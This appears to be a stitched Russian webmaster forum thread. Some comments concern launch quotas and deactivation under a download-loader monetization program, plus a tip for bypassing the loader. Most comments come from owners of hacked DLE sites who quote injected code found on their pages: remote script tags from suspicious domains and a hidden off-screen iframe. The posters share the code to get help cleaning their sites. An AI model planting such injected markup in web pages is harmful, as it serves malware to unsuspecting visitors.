Деактивировали опять. За последние трое суток было 599 запусков)
Заметил такую интересную штуку - если на DLE сайте открывать ссылку на скачивание в новой вкладке, или скопировать и вставить в адресную строку - то отдается просто файл, в обход загрузчика.
У тебя 596 запусков за последние три дня, а надо 600.
Блин, осталось полчаса, а мне до 600 не хватает каких-то 48 запусков :(. Жаль конечно, что будет по итогам трех суток, а не недели - за неделю получается 1500 запусков, так что в среднем 200 в сутки есть.
Скажите, а вот если таки не вытяну 200 запусков - то бан аккаунта, или просто приостановка?
Блин, ну что за западло - только-только оправился от взлома сайтов, траф пошел вверх, и вы вводите ограничение.
Шелл ведет себя очень интересно - код появляется где-то посередине ночи и пропадает к 14-15 часам дня. И все равно никак не могу найти, где он гнездится, перерыл абсолютно все, искал во всех файлах скрипты, функции кодирования в бэйс64, редиректы мобильных устройств - ничего.
Позавчера тоже взломали два сайта на DLE, которые были на одном хостинге. Сначала в админке у одного высветилось предупреждение, мол отсутствует файл .htacces в папке uploads, хотя он был в папке. Ну я недавно делал бэкап, поэтому заменил этот файл, и сменил пасс от фтп. А в полночь уже при переходе на мои сайты браузер начал ругаться, мол вредоносные сайты. Посмотрел - в начале гнездилась такая строчка:
<script async="async" type="text/javascript" src="http://yakire.co.uv/forum.php"></script>
Начал шерстить все файлы движка на предмет вредоносного кода, смотрел примеры в гугле, но ничего не нашел. Скачал бэкап базы, и там нашел эту ссылку. Почистил, залил на хостинг. На полдня код пропал. Сегодня утром захожу - гнездится уже такая гадость:
<div id="modal_wn" style="top: -1280px; width: 340; height: 480; position: absolute; overflow:auto; left: expression(-450*43); z-index: 540; background-color:#ff0000;"><iframe name="ajaxloadbox" align="absmiddle" src ="http://jkte4.artgauther.biz/9bC6Wf_d6b0f6c0-3cf1_0I948A729_00_15_3f4-1eW.html" title="AjaxShowSlideMenu"width="115" height="390" hspace="11" vspace="9"></iframe></div>
Сегодня буду менять файлы движка на оригинальные, посмотрим, что будет.
Вот такая вот дрянь появилась на всех страницах в начале -<script async="async" language="JavaScript" rel="nofollow" src="http://yakire.co.vu/ws/forum.php"></script>
Перерыл абсолютно все php/js файлы, проверил базу, сделал перестроение публикаций, но не нашел, откуда эта гадость лезет. Есть еще какие-нибудь идеи?
P.S. На хостинге два сайта, оба были взломаны одновременно.
По сравнению с вчерашним днем просадка конверсии на 25 и CPM на 300
